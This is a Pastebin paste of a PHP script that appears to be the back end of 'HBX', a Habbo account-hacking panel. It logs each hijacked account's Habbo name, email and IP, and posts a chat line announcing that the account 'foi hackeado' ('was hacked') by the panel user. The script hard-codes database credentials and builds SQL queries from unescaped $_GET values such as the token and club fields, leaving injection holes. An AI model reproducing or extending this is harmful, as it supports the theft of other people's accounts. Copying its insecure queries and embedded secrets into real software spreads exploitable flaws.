Advertisement
Guest User

Untitled

a guest
Mar 18th, 2017
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.78 KB | None | 0 0
  1. <?
  2. $mysql_host = "localhost";
  3. $mysql_user = "myhbxcoc";
  4. $mysql_password = "eX290sed3V";
  5. $mysql_database = "myhbxcoc_hbx";
  6. mysql_connect($mysql_host,$mysql_user,$mysql_password) or die(mysql_error());
  7. mysql_select_db($mysql_database);
  8. @date_default_timezone_set("America/Fortaleza");
  9. @session_start();
  10. if((time() - $_SESSION['flood'])>0) {
  11. unset($_SESSION['flood']);
  12. }
  13. $query = mysql_query("select * from `hbx_securityTokens` where token = '".$_GET['token']."'");
  14. $query = mysql_fetch_array($query);
  15. if(empty($query)) {
  16. die("<b style=color:red>XSRF Detected</b><br><br>Uma tentativa de explorar falha foi detectada [X-TOKEN INVALIDO]");
  17. }
  18. mysql_query("delete from `hbx_securityTokens` where token = '".$_GET['token']."'");
  19. $hbx_id = addslashes($_GET['hid']);
  20. isset($_SESSION['flood'])? die("Anti-Flood!") : $_SESSION['flood'] = time()+25;
  21. $query = @mysql_query("select * from hbx_users where id='".addslashes($_GET['id'])."' and hbx_id = '$hbx_id'") or die(mysql_error());
  22. $dados = mysql_fetch_array($query);
  23. if($dados['nick']=="") die("Id não existe.");
  24. $nick = $dados['nick'];
  25. $mail = addslashes(strip_tags($_GET['email']));
  26. $date = date("d/m/Y h:i:s");
  27. $ip = $_SERVER['REMOTE_ADDR'];
  28. $habbo = htmlspecialchars($_GET['h']);
  29. if(!$habbo||$habbo == "null") die("Sem habbo.");
  30. $n_ick = "&raquo; BotHBX";
  31. $msg = "<font color=orange>o Habbo <b>$habbo</b> foi hackeado por <b>$nick</b>!</font>";
  32. $suc = @mysql_query("INSERT INTO `hbx_chat` (`id`, `nick`, `message`, `del`,`hbx_id`) VALUES ('', '$n_ick', \"$msg\", '0','$hbx_id');") or die(mysql_error());
  33.  
  34.  
  35. echo "S=".mysql_query("INSERT INTO `hbx_logs` (`id` ,
  36. `owner` ,
  37. `email` ,
  38. `habbo`,
  39. `date` ,
  40. `ip`,
  41. `hbx_id`,
  42. `club`
  43. )
  44. VALUES (
  45. NULL , '$nick', '$mail', '$habbo', '$date', '$ip','$hbx_id','".$_GET['club']."');");
  46. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement